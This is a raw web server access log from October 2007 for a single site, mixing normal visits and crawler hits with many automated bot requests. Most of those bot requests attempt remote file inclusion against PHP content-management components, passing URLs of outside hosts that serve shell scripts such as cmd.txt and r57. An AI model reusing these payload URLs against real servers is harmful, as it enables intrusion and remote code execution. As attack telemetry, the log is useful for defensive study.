200.117.189.143 - - [15/Oct/2007:14:09:06 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM)" "www.galf.org"
200.117.189.143 - - [15/Oct/2007:14:09:18 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM)" "www.galf.org"
200.117.189.143 - - [15/Oct/2007:14:09:24 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM)" "www.galf.org"
200.117.189.143 - - [15/Oct/2007:14:09:33 -0700] "GET /logs/access.log HTTP/1.1" 200 100350 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM)" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:09:44 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:09:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:09:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:09:45 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.180.250.117 - - [15/Oct/2007:14:10:45 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
198.77.208.8 - - [15/Oct/2007:14:10:52 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://s3xy.ifrance.com/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
198.77.208.8 - - [15/Oct/2007:14:10:53 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://s3xy.ifrance.com/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:13:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:13:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:13:11 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:13:11 -0700] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.200.104.142 - - [15/Oct/2007:14:13:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.200.104.142 - - [15/Oct/2007:14:13:33 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:14:02 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [15/Oct/2007:14:14:02 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:14:02 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
71.100.239.165 - - [15/Oct/2007:14:14:31 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?hl=en&q=lesbianas" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.galf.org"
71.100.239.165 - - [15/Oct/2007:14:14:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:14:45 -0700] "GET /logs/access_071001.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.163.19.18 - - [15/Oct/2007:14:15:30 -0700] "GET /index2.php?x=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:14:16:21 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:14:16:21 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
69.16.195.170 - - [15/Oct/2007:14:16:22 -0700] "GET /logs/access.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:16:22 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.216.123.11 - - [15/Oct/2007:14:17:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
66.216.123.11 - - [15/Oct/2007:14:17:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:18:04 -0700] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.163.19.18 - - [15/Oct/2007:14:20:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.163.19.18 - - [15/Oct/2007:14:20:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
201.216.236.100 - - [15/Oct/2007:14:20:06 -0700] "GET /modules/xfsection/modify.php?dir_module=http://diabinho.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.78.110.10 - - [15/Oct/2007:14:20:30 -0700] "GET /bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
213.163.19.18 - - [15/Oct/2007:14:21:23 -0700] "GET /index2.php?x=http://www.indyrx8club.com/forums/chat/inc/cmses/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.227 - - [15/Oct/2007:14:21:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.227 - - [15/Oct/2007:14:21:47 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:14:21:50 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:14:21:50 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:14:21:54 -0700] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:14:21:54 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.218.122 - - [15/Oct/2007:14:22:02 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.218.122 - - [15/Oct/2007:14:22:02 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nogrod.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
217.160.21.158 - - [15/Oct/2007:14:22:14 -0700] "GET /logs/http://missdica.com/board/skin/zero_vote/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.21.158 - - [15/Oct/2007:14:22:14 -0700] "GET /http://missdica.com/board/skin/zero_vote/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:14:22:36 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.37.230 - - [15/Oct/2007:14:22:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:14:22:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.72.161.26 - - [15/Oct/2007:14:22:45 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:14:22:49 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.72.161.26 - - [15/Oct/2007:14:22:56 -0700] "GET //components/com_minibb.php?absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:23:17 -0700] "GET /logs/access_070826.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
129.120.244.174 - - [15/Oct/2007:14:24:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?q=lesbianas&as_st=y&ndsp=20&svnum=10&um=1&hl=en&safe=off&ie=UTF-8&sa=N&tab=iw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
129.120.244.174 - - [15/Oct/2007:14:25:00 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
129.120.244.174 - - [15/Oct/2007:14:25:02 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
129.120.244.174 - - [15/Oct/2007:14:25:03 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
129.120.244.174 - - [15/Oct/2007:14:25:06 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:14:25:10 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:14:25:11 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.148.126.98 - - [15/Oct/2007:14:26:05 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.148.126.98 - - [15/Oct/2007:14:26:05 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.59.185.50 - - [15/Oct/2007:14:27:20 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:14:27:20 -0700] "GET //administrator/components/com_bayesiannaivefilter/uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:14:27:23 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.78.110.10 - - [15/Oct/2007:14:27:41 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
74.218.24.8 - - [15/Oct/2007:14:27:55 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.218.24.8 - - [15/Oct/2007:14:27:55 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.218.24.8 - - [15/Oct/2007:14:27:59 -0700] "GET /logs//phpRaid/rss.php?phpraid_dir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.218.24.8 - - [15/Oct/2007:14:27:59 -0700] "GET //phpRaid/rss.php?phpraid_dir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.78.110.10 - - [15/Oct/2007:14:28:22 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
203.78.110.10 - - [15/Oct/2007:14:28:22 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
60.234.65.98 - - [15/Oct/2007:14:29:03 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:29:06 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:29:31 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.10.33 - - [15/Oct/2007:14:29:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
203.78.110.10 - - [15/Oct/2007:14:29:34 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
203.78.110.10 - - [15/Oct/2007:14:29:34 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:30:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [15/Oct/2007:14:30:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:31:14 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:31:16 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:31:19 -0700] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.163.19.18 - - [15/Oct/2007:14:31:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:31:23 -0700] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:31:24 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:31:24 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:31:24 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:31:24 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [15/Oct/2007:14:31:30 -0700] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [15/Oct/2007:14:31:30 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [15/Oct/2007:14:31:30 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:31:35 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:31:36 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.3.192.124 - - [15/Oct/2007:14:31:36 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/brondonk_tengah_malam/safe2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
213.219.241.2 - - [15/Oct/2007:14:31:43 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mx4ever.de/components/com_simpleboard/contr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.30.60.158 - - [15/Oct/2007:14:31:44 -0700] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [15/Oct/2007:14:31:45 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [15/Oct/2007:14:31:45 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:31:47 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:31:48 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.16.195.170 - - [15/Oct/2007:14:31:49 -0700] "GET /logs/access_070917.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:31:55 -0700] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:31:56 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:31:56 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:31:58 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
62.2.177.147 - - [15/Oct/2007:14:31:58 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:32:06 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [15/Oct/2007:14:32:07 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [15/Oct/2007:14:32:09 -0700] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [15/Oct/2007:14:32:10 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [15/Oct/2007:14:32:10 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
219.94.145.104 - - [15/Oct/2007:14:32:19 -0700] "GET /logs/access_071001.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
219.94.145.104 - - [15/Oct/2007:14:32:25 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [15/Oct/2007:14:32:25 -0700] "GET //administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:32:36 -0700] "GET /logs/access_070924.log//phpRaid/rss.php?phpraid_dir=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [15/Oct/2007:14:32:36 -0700] "GET /logs/access_071001.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:32:36 -0700] "GET //phpRaid/rss.php?phpraid_dir=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:32:37 -0700] "GET /logs//phpRaid/rss.php?phpraid_dir=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.177.147 - - [15/Oct/2007:14:32:45 -0700] "GET /logs/access_071001.log//administrator/components/com_bayesiannaivefilter/http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
